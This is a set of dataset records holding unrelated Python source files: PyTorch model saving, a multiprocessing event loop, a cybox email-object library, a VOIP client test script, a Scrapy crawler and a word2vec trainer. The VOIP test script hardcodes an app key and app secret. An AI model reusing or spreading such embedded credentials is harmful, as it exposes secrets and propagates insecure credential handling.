self.linearlayer2(x))\n return self.layers(x)\n #raise NotImplementedError('MLPClassifier.forward')\n\n\nmodel_factory = {\n 'linear': LinearClassifier,\n 'mlp': MLPClassifier,\n}\n\n\ndef save_model(model):\n from torch import save\n from os import path\n for n, m in model_factory.items():\n if isinstance(model, m):\n return save(model.state_dict(), path.join(path.dirname(path.abspath(__file__)), '%s.th' % n))\n raise ValueError(\"model type '%s' not supported!\" % str(type(model)))\n\n\ndef load_model(model):\n from torch import load\n from os import path\n r = model_factory[model]()\n r.load_state_dict(load(path.join(path.dirname(path.abspath(__file__)), '%s.th' % model), map_location='cpu'))\n return r\n","sub_path":"part1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621297241","text":"\nimport multiprocessing\nimport select\nimport traceback\n\nclass HelperBase(multiprocessing.Process):\n \"\"\"This class performs IO in a different process to avoid blocking.\n\n It uses a multiprocessing.Connection to communicate back to the main loop\n since that object provides a FD compatible with select calls.\n \"\"\"\n def __init__(self):\n super(HelperBase, self).__init__()\n a, b = multiprocessing.Pipe()\n\n # Connection for the control process to use.\n self.connection = a\n\n # Connection for the local process to use.\n self._connection = b\n\n def run(self):\n assert False, \"Not implemented.\"\n\n\nclass HelperLoop(object):\n \"\"\"This class creates an event loop for classes that extend HelperBase.\n\n To use it, call setup_helper whenever you want to add a new\n HelperBase derived class, (and a handler for incoming messages.) Outgoing\n messages can be sent for anywhere you like (normally other handlers.)\n \"\"\"\n def __init__(self):\n # Maps connection objects to handler methods.\n self._incoming_connections = {}\n\n def setup_helper(self, helper, handler):\n self._incoming_connections[helper.connection] = handler\n helper.start()\n\n def run_forever(self):\n while True:\n rready, _, _ = select.select(self._incoming_connections.keys(), [], [])\n\n for c in rready:\n try:\n self._incoming_connections[c](c.recv())\n # pylint: disable=W0703\n except Exception:\n # If we get an exception in a handler, we log and continue.\n traceback.print_exc()\n","sub_path":"helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546822546","text":"import cybox\nimport cybox.bindings.email_message_object_1_2 as email_message_binding\nfrom cybox.common import DefinedObject, String, PositiveInteger, DateTime\nfrom cybox.objects.file_object import File\nfrom cybox.objects.uri_object import URI\nfrom cybox.objects.address_object import Address, EmailAddress\n\nclass EmailRecipients(cybox.Entity):\n def __init__(self, *args):\n self.recipients = []\n for arg in args:\n self.add(arg)\n\n def add(self, recipient):\n if recipient is not None and not isinstance(recipient, Address):\n if isinstance(recipient, basestring):\n recipient = EmailAddress(recipient)\n else:\n msg = \"Cannot convert {} (type {}) to an Address\"\n raise ValueError(msg.format(recipient, type(recipient)))\n self.recipients.append(recipient)\n\n def __nonzero__(self):\n return bool(self.recipients)\n\n __bool__ = __nonzero__\n\n def to_obj(self):\n recipients_obj = email_message_binding.EmailRecipientsType()\n for recipient in self.recipients:\n recipients_obj.add_Recipient(recipient.to_obj())\n return recipients_obj\n\n def to_dict(self):\n return [r.to_dict() for r in self.recipients]\n\n @staticmethod\n def from_obj(recipients_obj):\n r = EmailRecipients()\n if recipients_obj is not None:\n r.recipients = [Address.from_obj(a)\n for a in recipients_obj.get_Recipient()]\n return r\n\n @staticmethod\n def from_dict(recipients_dict):\n if not recipients_dict:\n return None\n\n # recipients_dict should really be a list, not a dict\n r = EmailRecipients()\n if recipients_dict is not None:\n r.recipients = [Address.from_dict(a, Address.CAT_EMAIL)\n for a in recipients_dict]\n return r\n\n\nclass EmailHeader(cybox.Entity):\n def __init__(self):\n self.to = None\n self.cc = None\n self.bcc = None\n self.from_ = None\n self.subject = None\n self.in_reply_to = None\n self.date = None\n self.message_id = None\n self.sender = None\n self.reply_to = None\n self.errors_to = None\n\n @property\n def to(self):\n return self._to\n\n @to.setter\n def to(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._to = value\n\n @property\n def cc(self):\n return self._cc\n\n @cc.setter\n def cc(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._cc = value\n\n @property\n def bcc(self):\n return self._bcc\n\n @bcc.setter\n def bcc(self, value):\n if value is not None and not isinstance(value, EmailRecipients):\n value = EmailRecipients(value)\n self._bcc = value\n\n @property\n def from_(self):\n return self._from\n\n @from_.setter\n def from_(self, value):\n if value is not None and not isinstance(value, Address):\n value = EmailAddress(value)\n self._from = value\n\n @property\n def subject(self):\n return self._subject\n\n @subject.setter\n def subject(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._subject = value\n\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, value):\n if value is not None and not isinstance(value, DateTime):\n value = DateTime(value)\n self._date = value\n\n @property\n def message_id(self):\n return self._message_id\n\n @message_id.setter\n def message_id(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._message_id = value\n\n @property\n def sender(self):\n return self._sender\n\n @sender.setter\n def sender(self, value):\n if value is not None and not isinstance(value, Address):\n value = EmailAddress(value)\n self._sender = value\n\n def to_obj(self):\n header_obj = email_message_binding.EmailHeaderType()\n\n if self.to:\n header_obj.set_To(self.to.to_obj())\n if self.cc:\n header_obj.set_CC(self.cc.to_obj())\n if self.bcc:\n header_obj.set_BCC(self.bcc.to_obj())\n if self.from_:\n header_obj.set_From(self.from_.to_obj())\n if self.subject:\n header_obj.set_Subject(self.subject.to_obj())\n if self.in_reply_to:\n header_obj.set_In_Reply_To(self.in_reply_to.to_obj())\n if self.date:\n header_obj.set_Date(self.date.to_obj())\n if self.message_id:\n header_obj.set_Message_ID(self.message_id.to_obj())\n if self.sender:\n header_obj.set_Sender(self.sender.to_obj())\n if self.reply_to:\n header_obj.set_Reply_To(self.reply_to.to_obj())\n if self.errors_to:\n header_obj.set_Errors_To(self.errors_to.to_obj())\n\n return header_obj\n\n def to_dict(self):\n header_dict = {}\n\n if self.to:\n header_dict['to'] = self.to.to_dict()\n if self.cc:\n header_dict['cc'] = self.cc.to_dict()\n if self.bcc:\n header_dict['bcc'] = self.bcc.to_dict()\n if self.from_:\n header_dict['from'] = self.from_.to_dict()\n if self.subject:\n header_dict['subject'] = self.subject.to_dict()\n if self.in_reply_to:\n header_dict['in_reply_to'] = self.in_reply_to.to_dict()\n if self.date:\n header_dict['date'] = self.date.to_dict()\n if self.message_id:\n header_dict['message_id'] = self.message_id.to_dict()\n if self.sender:\n header_dict['sender'] = self.sender.to_dict()\n if self.reply_to:\n header_dict['reply_to'] = self.reply_to.to_dict()\n if self.errors_to:\n header_dict['errors_to'] = self.errors_to.to_dict()\n\n return header_dict\n\n @staticmethod\n def from_obj(header_obj):\n header = EmailHeader()\n\n header.to = EmailRecipients.from_obj(header_obj.get_To())\n header.cc = EmailRecipients.from_obj(header_obj.get_CC())\n header.bcc = EmailRecipients.from_obj(header_obj.get_BCC())\n header.from_ = Address.from_obj(header_obj.get_From())\n header.subject = String.from_obj(header_obj.get_Subject())\n header.in_reply_to = String.from_obj(header_obj.get_In_Reply_To())\n header.date = DateTime.from_obj(header_obj.get_Date())\n header.message_id = String.from_obj(header_obj.get_Message_ID())\n header.sender = Address.from_obj(header_obj.get_Sender())\n header.reply_to = Address.from_obj(header_obj.get_Reply_To())\n header.errors_to = String.from_obj(header_obj.get_Errors_To())\n\n return header\n\n @staticmethod\n def from_dict(header_dict):\n header = EmailHeader()\n\n header.to = EmailRecipients.from_dict(header_dict.get('to'))\n header.cc = EmailRecipients.from_dict(header_dict.get('cc'))\n header.bcc = EmailRecipients.from_dict(header_dict.get('bcc'))\n header.from_ = Address.from_dict(header_dict.get('from'), Address.CAT_EMAIL)\n header.subject = String.from_dict(header_dict.get('subject'))\n header.in_reply_to = String.from_dict(header_dict.get('in_reply_to'))\n header.date = DateTime.from_dict(header_dict.get('date'))\n header.message_id = String.from_dict(header_dict.get('message_id'))\n header.sender = Address.from_dict(header_dict.get('sender'), Address.CAT_EMAIL)\n header.reply_to = Address.from_dict(header_dict.get('reply_to'), Address.CAT_EMAIL)\n header.errors_to = String.from_dict(header_dict.get('errors_to'))\n\n return header\n\n\nclass OptionalHeader(cybox.Entity):\n def __init__(self):\n self.boundary = None\n self.content_type = None\n self.mime_version = None\n self.precedence = None\n self.x_mailer = None\n self.x_originating_ip = None\n self.x_priority = None\n\n @property\n def x_originating_ip(self):\n return self._x_originating_ip\n\n @x_originating_ip.setter\n def x_originating_ip(self, value):\n if value is not None and not isinstance(value, Address):\n value = Address(value, category=Address.CAT_IPV4)\n self._x_originating_ip = value\n\n def to_obj(self):\n opt_header_obj = email_message_binding.EmailOptionalHeaderType()\n\n if self.boundary:\n opt_header_obj.set_Boundary(self.boundary.to_obj())\n if self.content_type:\n opt_header_obj.set_Content_Type(self.content_type.to_obj())\n if self.mime_version:\n opt_header_obj.set_MIME_Version(self.mime_version.to_obj())\n if self.precedence:\n opt_header_obj.set_Precedence(self.precedence.to_obj())\n if self.x_mailer:\n opt_header_obj.set_X_Mailer(self.x_mailer.to_obj())\n if self.x_originating_ip:\n opt_header_obj.set_X_Originating_IP(self.x_originating_ip.to_obj())\n if self.x_priority:\n opt_header_obj.set_X_Priority(self.x_priority.to_obj())\n\n return opt_header_obj\n\n def to_dict(self):\n opt_header_dict = {}\n\n if self.boundary:\n opt_header_dict['boundary'] = self.boundary.to_dict()\n if self.content_type:\n opt_header_dict['content_type'] = self.content_type.to_dict()\n if self.mime_version:\n opt_header_dict['mime_version'] = self.mime_version.to_dict()\n if self.precedence:\n opt_header_dict['precedence'] = self.precedence.to_dict()\n if self.x_mailer:\n opt_header_dict['x_mailer'] = self.x_mailer.to_dict()\n if self.x_originating_ip:\n opt_header_dict['x_originating_ip'] = self.x_originating_ip.to_dict()\n if self.x_priority:\n opt_header_dict['x_priority'] = self.x_priority.to_dict()\n\n return opt_header_dict\n\n @staticmethod\n def from_obj(opt_header_obj):\n if not opt_header_obj:\n return None\n\n opt_header = OptionalHeader()\n\n opt_header.boundary = String.from_obj(opt_header_obj.get_Boundary())\n opt_header.content_type = String.from_obj(opt_header_obj.get_Content_Type())\n opt_header.mime_version = String.from_obj(opt_header_obj.get_MIME_Version())\n opt_header.precedence = String.from_obj(opt_header_obj.get_Precedence())\n opt_header.x_mailer = String.from_obj(opt_header_obj.get_X_Mailer())\n opt_header.x_originating_ip = Address.from_obj(opt_header_obj.get_X_Originating_IP())\n opt_header.x_priority = PositiveInteger.from_obj(opt_header_obj.get_X_Priority())\n\n return opt_header\n\n @staticmethod\n def from_dict(opt_header_dict):\n if not opt_header_dict:\n return None\n\n opt_header = OptionalHeader()\n\n opt_header.boundary = String.from_dict(opt_header_dict.get('boundary'))\n opt_header.content_type = String.from_dict(opt_header_dict.get('content_type'))\n opt_header.mime_version = String.from_dict(opt_header_dict.get('mime_version'))\n opt_header.precedence = String.from_dict(opt_header_dict.get('precedence'))\n opt_header.x_mailer = String.from_dict(opt_header_dict.get('x_mailer'))\n opt_header.x_originating_ip = Address.from_dict(opt_header_dict.get('x_originating_ip'), Address.CAT_IPV4)\n opt_header.x_priority = PositiveInteger.from_dict(opt_header_dict.get('x_priority'))\n\n return opt_header\n\n\nclass EmailMessage(DefinedObject):\n _XSI_TYPE = \"EmailMessageObjectType\"\n \n def __init__(self):\n self.attachments = []\n self.links = []\n self.header = EmailHeader()\n self.optional_header = None\n self.email_server = None\n self.raw_body = None\n self.raw_header = None\n\n @property\n def email_server(self):\n return self._email_server\n\n @email_server.setter\n def email_server(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._email_server = value\n\n @property\n def raw_body(self):\n return self._raw_body\n\n @raw_body.setter\n def raw_body(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._raw_body = value\n\n @property\n def raw_header(self):\n return self._raw_header\n\n @raw_header.setter\n def raw_header(self, value):\n if value is not None and not isinstance(value, String):\n value = String(value)\n self._raw_header = value\n\n # Shortcut properties\n @property\n def to(self):\n return self.header.to\n\n @to.setter\n def to(self, value):\n self.header.to = value\n\n @property\n def from_(self):\n return self.header.from_\n\n @from_.setter\n def from_(self, value):\n self.header.from_ = value\n\n @property\n def subject(self):\n return self.header.subject\n\n @subject.setter\n def subject(self, value):\n self.header.subject = value\n\n @property\n def date(self):\n return self.header.date\n\n @date.setter\n def date(self, value):\n self.header.date = value\n\n @property\n def message_id(self):\n return self.header.message_id\n\n @message_id.setter\n def message_id(self, value):\n self.header.message_id = value\n\n @property\n def sender(self):\n return self.header.sender\n\n @sender.setter\n def sender(self, value):\n self.header.sender = value\n\n @property\n def reply_to(self):\n return self.header.reply_to\n\n @reply_to.setter\n def reply_to(self, value):\n self.header.reply_to = value\n\n @property\n def x_originating_ip(self):\n if not self.optional_header:\n return None\n return self.optional_header.x_originating_ip\n\n @x_originating_ip.setter\n def x_originating_ip(self, value):\n if not self.optional_header:\n self.optional_header = OptionalHeader()\n self.optional_header.x_originating_ip = value\n\n def to_obj(self):\n email_obj = email_message_binding.EmailMessageObjectType()\n\n email_obj.set_anyAttributes_({'xsi:type' : 'EmailMessageObj:EmailMessageObjectType'})\n if self.attachments:\n attachments_obj = email_message_binding.AttachmentsType()\n for file_ in self.attachments:\n attachments_obj.add_File(file_.to_obj())\n email_obj.set_Attachments(attachments_obj)\n if self.links:\n links_obj = email_message_binding.LinksType()\n for uri in self.links:\n links_obj.add_Link(uri.to_obj())\n email_obj.set_Links(links_obj)\n email_obj.set_Header(self.header.to_obj())\n if self.optional_header:\n email_obj.set_Optional_Header(self.optional_header.to_obj())\n if self.email_server:\n email_obj.set_Email_Server(self.email_server.to_obj())\n if self.raw_body:\n email_obj.set_Raw_Body(self.raw_body.to_obj())\n if self.raw_header:\n email_obj.set_Raw_Header(self.raw_header.to_obj())\n\n return email_obj\n\n def to_dict(self):\n email_dict = {}\n if self.attachments:\n email_dict['attachments'] = [a.to_dict() for a in self.attachments]\n if self.links:\n email_dict['links'] = [l.to_dict() for l in self.links]\n email_dict['header'] = self.header.to_dict()\n if self.optional_header:\n email_dict['optional_header'] = self.optional_header.to_dict()\n if self.email_server:\n email_dict['email_server'] = self.email_server.to_dict()\n if self.raw_body:\n email_dict['raw_body'] = self.raw_body.to_dict()\n if self.raw_header:\n email_dict['raw_header'] = self.raw_header.to_dict()\n email_dict['xsi_type'] = self._XSI_TYPE\n \n return email_dict\n\n @staticmethod\n def from_obj(message_obj):\n message = EmailMessage()\n\n attachments = message_obj.get_Attachments()\n if attachments:\n for attachment in attachments.get_File():\n message.attachments.append(File.from_obj(attachment))\n\n links = message_obj.get_Links()\n if links:\n for link in links.get_Link():\n message.links.append(URI.from_obj(link))\n\n message.header = EmailHeader.from_obj(message_obj.get_Header())\n message.optional_header = OptionalHeader.from_obj(message_obj.get_Optional_Header())\n message.email_server = String.from_obj(message_obj.get_Email_Server())\n message.raw_body = String.from_obj(message_obj.get_Raw_Body())\n message.raw_header = String.from_obj(message_obj.get_Raw_Header())\n\n return message\n\n @staticmethod\n def from_dict(message_dict):\n message = EmailMessage()\n\n for attachment in message_dict.get('attachments', []):\n message.attachments.append(File.from_dict(attachment))\n for link in message_dict.get('links', []):\n message.links.append(URI.from_dict(link))\n message.header = EmailHeader.from_dict(message_dict.get('header'))\n message.optional_header = OptionalHeader.from_dict(message_dict.get('optional_header'))\n message.email_server = String.from_dict(message_dict.get('email_server'))\n message.raw_body = String.from_dict(message_dict.get('raw_body'))\n message.raw_header = String.from_dict(message_dict.get('raw_header'))\n\n return message\n","sub_path":"cybox/objects/email_message_object.py","file_name":"email_message_object.py","file_ext":"py","file_size_in_byte":17842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"164302608","text":"import base64\nimport json\nimport md5\nimport os\nimport select\nimport socket\nimport struct\nimport sys\nimport threading\nimport time\n\nimport requests\n\nMSG_HEARTBEAT = 1\nMSG_AUTH = 2\nMSG_AUTH_STATUS = 3\nMSG_ACK = 5\nMSG_PING = 13\nMSG_PONG = 14\nMSG_AUTH_TOKEN = 15\n\nMSG_VOIP_CONTROL = 64\nMSG_VOIP_DATA = 65\n\n\nVOIP_COMMAND_DIAL = 1\nVOIP_COMMAND_ACCEPT = 2\nVOIP_COMMAND_CONNECTED = 3\nVOIP_COMMAND_REFUSE = 4\nVOIP_COMMAND_REFUSED = 5\nVOIP_COMMAND_HANG_UP = 6\nVOIP_COMMAND_RESET = 7\nVOIP_COMMAND_TALKING = 8\n\n\nPLATFORM_IOS = 1\nPLATFORM_ANDROID = 2\n\nPROTOCOL_VERSION = 1\n\nAPP_ID = 7\nAPP_KEY = \"sVDIlIiDUm7tWPYWhi6kfNbrqui3ez44\"\nAPP_SECRET = '0WiCxAU1jh76SbgaaFC7qIaBPm2zkyM1'\n\nHOST = \"127.0.0.1\"\nPORT = 23000\nURL = \"http://192.168.33.10\"\n\ndevice_id = \"f9d2a7c2-701a-11e5-9c3e-34363bd464b2\"\nclass AuthenticationToken:\n def __init__(self):\n self.token = \"\"\n self.platform_id = PLATFORM_ANDROID\n self.device_id = device_id\n\n\nclass VOIPControl:\n def __init__(self):\n self.sender = 0\n self.receiver = 0\n self.cmd = 0\n self.dial_count = 1\n\nclass VOIPData:\n def __init__(self):\n self.sender = 0\n self.receiver = 0\n self.content = \"\"\n\ndef send_message(cmd, seq, msg, sock):\n if cmd == MSG_AUTH:\n h = struct.pack(\"!iibbbb\", 8, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!q\", msg.uid)\n sock.sendall(h + b)\n elif cmd == MSG_VOIP_CONTROL:\n if msg.cmd == VOIP_COMMAND_DIAL:\n length = 24\n else:\n length = 20\n \n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!qqi\", msg.sender, msg.receiver, msg.cmd)\n t = \"\"\n if msg.cmd == VOIP_COMMAND_DIAL:\n t = struct.pack(\"!i\", msg.dial_count)\n sock.sendall(h+b+t)\n elif cmd == MSG_VOIP_DATA:\n length = 16 + len(msg.content)\n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n b = struct.pack(\"!qq\", msg.sender, msg.receiver)\n sock.sendall(h+b+msg.content)\n elif cmd == MSG_AUTH_TOKEN:\n b = struct.pack(\"!BB\", msg.platform_id, len(msg.token)) + msg.token + struct.pack(\"!B\", len(msg.device_id)) + msg.device_id\n length = len(b)\n h = struct.pack(\"!iibbbb\", length, seq, cmd, PROTOCOL_VERSION, 0, 0)\n sock.sendall(h+b)\n else:\n print(\"eeeeee:\", cmd)\n\ndef recv_message(sock):\n buf = sock.recv(12)\n if len(buf) != 12:\n return 0, 0, None\n length, seq, cmd = struct.unpack(\"!iib\", buf[:9])\n content = sock.recv(length)\n if len(content) != length:\n return 0, 0, None\n\n if cmd == MSG_AUTH_STATUS:\n print(len(content), \"....\")\n status, = struct.unpack(\"!i\", content)\n return cmd, seq, status\n elif cmd == MSG_VOIP_CONTROL:\n ctl = VOIPControl()\n ctl.sender, ctl.receiver, ctl.cmd = struct.unpack(\"!qqi\", content[:20])\n if ctl.cmd == VOIP_COMMAND_DIAL:\n ctl.dial_count = struct.unpack(\"!i\", content[20:24])\n return cmd, seq, ctl\n elif cmd == MSG_VOIP_DATA:\n d = VOIPData()\n d.sender, d.receiver = struct.unpack(\"!qq\", content[:16])\n d.content = content[16:]\n return cmd, seq, d\n else:\n return cmd, seq, content\n\n\ndef login(uid):\n url = URL + \"/auth/grant\"\n obj = {\"uid\":uid, \"user_name\":str(uid)}\n secret = md5.new(APP_SECRET).digest().encode(\"hex\")\n basic = base64.b64encode(str(APP_ID) + \":\" + secret)\n headers = {'Content-Type': 'application/json; charset=UTF-8',\n 'Authorization': 'Basic ' + basic}\n \n res = requests.post(url, data=json.dumps(obj), headers=headers)\n if res.status_code != 200:\n print(res.status_code, res.content)\n return None\n obj = json.loads(res.text)\n return obj[\"data\"][\"token\"]\n\n\ndef connect_server(uid, port):\n token = login(uid)\n if not token:\n return None, 0\n seq = 0\n address = (HOST, port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n sock.connect(address)\n auth = AuthenticationToken()\n auth.token = token\n seq = seq + 1\n send_message(MSG_AUTH_TOKEN, seq, auth, sock)\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_AUTH_STATUS or msg != 0:\n return None, 0\n return sock, seq\n\ndef send_control(sock, seq, sender, receiver, cmd):\n ctl = VOIPControl()\n ctl.sender = sender\n ctl.receiver = receiver\n ctl.cmd = cmd\n send_message(MSG_VOIP_CONTROL, seq, ctl, sock)\n \ndef send_dial(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_DIAL)\n \ndef send_accept(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_ACCEPT)\n \ndef send_refuse(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_REFUSE)\n \ndef send_refused(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_REFUSED)\n\ndef send_connected(sock, seq, sender, receiver):\n send_control(sock, seq, sender, receiver, VOIP_COMMAND_CONNECTED)\n \ndef simultaneous_dial():\n caller = 86013800000000\n called = 86013800000009\n\n sock, seq = connect_server(caller, PORT)\n seq = seq + 1\n send_dial(sock, seq, caller, called)\n\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n return\n if msg.cmd == VOIP_COMMAND_ACCEPT:\n seq = seq + 1\n send_connected(sock, seq, caller, called)\n print(\"voip connected\")\n elif msg.cmd == VOIP_COMMAND_DIAL:\n seq = seq + 1\n send_accept(sock, seq, caller, called)\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n return\n\n if msg.cmd == VOIP_COMMAND_CONNECTED:\n print(\"voip connected\")\n elif msg.cmd == VOIP_COMMAND_ACCEPT:\n print(\"voip connected\")\n else:\n return\n elif msg.cmd == VOIP_COMMAND_REFUSE:\n print(\"dial refused\")\n seq = seq + 1\n send_refused(sock, seq, caller, called)\n return\n else:\n print(\"unknow:\", msg.content)\n return\n\n while True:\n cmd, _, msg = recv_message(sock)\n if cmd == MSG_VOIP_CONTROL:\n print(\"recv voip control:\", msg.cmd)\n if msg.cmd == VOIP_COMMAND_HANG_UP:\n print(\"peer hang up\")\n break\n else:\n print(\"unknow command:\", cmd)\n \ndef listen():\n caller = 0\n called = 86013800000009\n sock, seq = connect_server(called, PORT)\n while True:\n print(\"recv...\")\n cmd, _, msg = recv_message(sock)\n print(cmd, msg)\n if cmd != MSG_VOIP_CONTROL:\n continue\n if msg.cmd != VOIP_COMMAND_DIAL:\n continue\n caller = msg.sender\n break\n\n is_accept = query_yes_no(\"accept incoming dial\")\n if is_accept:\n seq = seq + 1\n send_accept(sock, seq, called, caller)\n while True:\n cmd, _, msg = recv_message(sock)\n if cmd != MSG_VOIP_CONTROL:\n continue\n\n if msg.cmd != VOIP_COMMAND_CONNECTED:\n continue\n else:\n print(\"voip control:\", msg.cmd)\n print(\"voip connected caller:%d called:%d\"%(caller, called))\n break\n else:\n seq = seq + 1\n send_refuse(sock, seq, called, caller)\n return\n\n address = ('0.0.0.0', 20001)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n b = struct.pack(\"!qq\", called, caller)\n b += \"\\x00\\x00\"\n s.sendto(b, (HOST, 20001))\n\n while True:\n rs, _, _ = select.select([s, sock], [], [])\n if s in rs:\n data, addr = s.recvfrom(64*1024)\n sender, receiver = struct.unpack(\"!qq\", data[:16])\n print(\"sender:\", sender, \"receiver:\", receiver, \" size:\", len(data[16:]))\n if sock in rs:\n cmd, _, msg = recv_message(sock)\n if cmd == MSG_VOIP_CONTROL:\n print(\"recv voip control:\", msg.cmd)\n if msg.cmd == VOIP_COMMAND_HANG_UP:\n print(\"peer hang up\")\n break\n elif cmd == 0:\n print(\"voip control socket closed\")\n break\n else:\n print(\"unknow command:\", cmd)\n\ndef query_yes_no(question, default=\"yes\"):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is one of \"yes\" or \"no\".\n \"\"\"\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"usage:voip_client.py call/wait\")\n sys.exit(0)\n if sys.argv[1] == \"call\":\n simultaneous_dial()\n elif sys.argv[1] == \"wait\":\n listen()\n else:\n print(\"usage:voip_client.py call/wait\")\n","sub_path":"tests/voip_client.py","file_name":"voip_client.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624180013","text":"import scrapy\nfilepath = 'C:/Users/harsh/PycharmProjects/IR Project/pages/'\nurlpath = 'C:/Users/harsh/PycharmProjects/IR Project/'\nclass ToScrapeCSSSpider(scrapy.Spider):\n name = \"toscrape\"\n allowed_domains = [\"uic.edu\"]\n start_urls = [\n \"https://www.cs.uic.edu/\"\n ]\n custom_settings = {'DEPTH_PRIORITY':1, 'SCHEDULER_DISK_QUEUE': 'scrapy.squeues.PickleFifoDiskQueue',\n 'SCHEDULER_MEMORY_QUEUE': 'scrapy.squeues.FifoMemoryQueue'}\n count = 0;\n count_max = 3000;\n url_list = dict()\n def parse(self, response):\n if self.count < self.count_max:\n if response.url not in self.url_list.keys():\n self.url_list[response.url] = 1\n self.count += 1;\n filename = str(self.count) + '.html'\n global filepath\n with open(filepath + filename, 'wb') as f:\n f.write(response.body);\n with open(urlpath +'urlList.txt', 'a') as x:\n x.write(response.url + \"\\n\");\n urls = response.css('a::attr(href)')\n for url in urls:\n yield response.follow(url, callback=self.parse)\n else:\n raise scrapy.exceptions.CloseSpider(reason='Page Count Reached');\n return;","sub_path":"crawler/spiders/toscrape.py","file_name":"toscrape.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252688800","text":"#!/usr/bin/env python3\r\n\"\"\"\r\n1. tf_idf\r\n\"\"\"\r\n\r\nimport gensim as g\r\n\r\n\r\ndef word2vec_model(sentences,\r\n size=100,\r\n min_count=5,\r\n window=5,\r\n negative=5,\r\n cbow=True,\r\n iterations=5,\r\n seed=0,\r\n workers=1):\r\n \"\"\"[Function that creates and trains a gensim word2vec model]\r\n\r\n Args:\r\n sentences ([list]): [sentences to be trained on]\r\n size (int, optional): [is the dimensionality of the embedding\r\n layer]. Defaults to 100.\r\n min_count (int, optional): [minimum number of occurrences of a word\r\n for use in training]. Defaults to 5.\r\n window (int, optional): [maximum distance between the current and\r\n predicted word within a sentence].\r\n Defaults to 5.\r\n negative (int, optional): [size of negative sampling]. Defaults to 5\r\n cbow (bool, optional): [boolean to determine the training type;\r\n True is for CBOW; False is for Skip-gram]\r\n Defaults to True.\r\n iterations (int, optional): [number of iterations to train over].\r\n Defaults to 5.\r\n seed (int, optional): [seed for the random number generator].\r\n Defaults to 0.\r\n workers (int, optional): [number of worker threads to train the\r\n model]. Defaults to 1.\r\n\r\n Returns:\r\n [type]: [the trained model]\r\n \"\"\"\r\n\r\n # https://radimrehurek.com/gensim/models/word2vec.html\r\n\r\n sg = 0 if cbow else 1\r\n\r\n model = g.models.Word2Vec(sentences=sentences,\r\n size=size,\r\n window=window,\r\n min_count=min_count,\r\n negative=negative,\r\n sg=sg,\r\n seed=seed,\r\n workers=workers,\r\n iter=iterations)\r\n\r\n total_examples = model.corpus_count\r\n\r\n # To avoid common mistakes around the model’s ability to do multiple\r\n # training passes itself, an explicit epochs argument MUST be provided.\r\n # In the common and recommended case where train() is only called once,\r\n # you can set epochs=self.iter.\r\n epochs = model.iter\r\n\r\n model.train(sentences=sentences,\r\n total_examples=total_examples,\r\n epochs=epochs)\r\n\r\n return model\r\n","sub_path":"supervised_learning/0x0F-word_embeddings/2-word2vec.py","file_name":"2-word2vec.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609792802","text":"from fast_rcnn.nms_wrapper import nms\nimport numpy as np\nimport cPickle\nimport os\nfrom cache.test_results_cache import TestResultsCache\n\n\nclass aggregateModelOutput():\n \n def __init__(self,imdb,num_samples,output_dir,task,score_thresh,nms_thresh,max_dets_per_image,visualize_bool,cfg):\n self.visualize_bool = visualize_bool\n self.score_thresh = score_thresh\n self.num_samples = num_samples\n self.nms_thresh = nms_thresh\n self.task = task\n self.results = None\n self.det_file = None\n self.save_key = None\n self.num_classes = imdb.num_classes\n self.init_results_obj(output_dir) # sets above variables\n self.classes = imdb.classes\n self.max_dets_per_image = max_dets_per_image\n self.save_cache = TestResultsCache(output_dir,cfg,imdb.config,None,'agg_model_output')\n\n def init_results_obj(self,output_dir):\n if self.task == 'object_detection':\n all_boxes = [[[] for _ in xrange(self.num_samples)]\n for _ in 